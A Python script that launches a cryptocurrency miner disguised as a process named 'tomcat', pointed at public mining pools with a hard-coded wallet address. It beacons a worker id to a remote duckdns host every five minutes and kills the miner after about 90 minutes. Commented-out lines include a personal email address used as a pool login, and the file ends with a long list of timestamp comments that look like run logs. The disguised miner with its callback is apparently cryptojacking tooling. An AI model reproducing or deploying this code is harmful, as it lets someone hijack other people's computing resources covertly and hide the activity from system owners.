import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:04.107475
#2018-02-17 17:06:06.983558
#2018-02-17 18:54:05.061743
#2018-02-17 20:42:03.717818
#2018-02-17 22:29:06.915368
#2018-02-18 00:12:04.202401
#2018-02-18 02:03:06.901868
#2018-02-18 03:51:05.708123
#2018-02-18 05:38:07.098555
#2018-02-18 07:31:04.743422
#2018-02-18 09:19:05.173594
#2018-02-18 11:05:06.210938
#2018-02-18 12:52:07.232157
#2018-02-18 14:38:06.952053
#2018-02-18 16:28:02.123898
#2018-02-18 18:17:02.066070
#2018-02-18 20:01:07.628607
#2018-02-18 21:48:04.142978
#2018-02-18 23:37:04.598673
#2018-02-19 01:23:01.845004
#2018-02-19 03:11:04.425896
#2018-02-19 04:56:04.519017
#2018-02-19 06:40:02.989252
#2018-02-19 08:29:07.224971
#2018-02-19 10:18:05.378588
#2018-02-19 12:06:06.383873
#2018-02-19 13:54:08.719452
#2018-02-19 15:44:10.660003
#2018-02-19 17:32:01.864410
#2018-02-19 19:18:08.796832
#2018-02-19 21:07:07.610931
#2018-02-19 22:54:01.274908
#2018-02-20 00:37:06.208127
#2018-02-20 02:26:06.643081
#2018-02-20 04:16:07.610712
#2018-02-20 05:58:07.056273
#2018-02-20 07:44:01.491388
#2018-02-20 09:29:05.656116
#2018-02-20 11:13:04.222434
#2018-02-20 12:59:10.870817
#2018-02-20 14:43:08.826350
#2018-02-20 16:31:07.455473
#2018-02-20 18:18:06.316926
#2018-02-20 20:09:04.130040
#2018-02-20 21:56:01.417999
#2018-02-20 23:36:01.409055
#2018-02-21 01:19:07.011011
#2018-02-21 03:08:05.466104
#2018-02-21 04:56:06.397557
#2018-02-21 06:44:05.248371
#2018-02-21 08:32:07.202134
#2018-02-21 10:18:05.837654
#2018-02-21 12:05:01.369992
#2018-02-21 13:54:04.653248
#2018-02-21 15:40:04.068686
#2018-02-21 17:31:06.810419
#2018-02-21 19:18:06.231476
#2018-02-21 21:06:06.283934
#2018-02-21 22:54:05.853841
#2018-02-22 00:43:01.335263
#2018-02-22 02:31:01.658717
#2018-02-22 04:17:03.681342
#2018-02-22 06:02:05.569002
#2018-02-22 07:48:06.331756
#2018-02-22 09:37:05.083571
#2018-02-22 11:24:02.144272
#2018-02-22 13:11:08.854869
#2018-02-22 14:59:09.178626
#2018-02-22 16:43:01.702774
#2018-02-22 18:28:05.915485
#2018-02-22 20:21:04.869157
#2018-02-22 22:06:04.308381
#2018-02-22 23:52:01.857987
#2018-02-23 01:40:03.320423
#2018-02-23 03:26:05.335963
#2018-02-23 05:13:07.021213
#2018-02-23 06:58:05.372468
#2018-02-23 08:47:08.254224
#2018-02-23 11:01:06.081676
#2018-02-23 12:56:05.693170
#2018-02-23 14:41:06.089963
#2018-02-23 16:31:08.334366
#2018-02-23 18:17:06.131094
#2018-02-23 20:01:08.025989
#2018-02-23 21:44:07.235140
#2018-02-23 23:38:01.929048
#2018-02-24 01:27:02.223774
#2018-02-24 03:17:07.043793
#2018-02-24 05:02:04.606526
#2018-02-24 06:52:03.439656
#2018-02-24 08:42:01.651334
#2018-02-24 10:26:01.792255
#2018-02-24 12:21:08.131642
#2018-02-24 14:14:07.467922
#2018-02-24 16:00:10.076711
#2018-02-24 17:52:07.046436
#2018-02-24 19:39:06.882312
#2018-02-24 21:26:02.140014
#2018-02-25 00:08:01.599627
#2018-02-25 03:20:06.434951
#2018-02-25 06:04:05.758753
#2018-02-25 10:37:01.252907
#2018-02-25 12:10:03.774690
#2018-02-25 14:22:01.930406
#2018-02-25 15:57:02.056410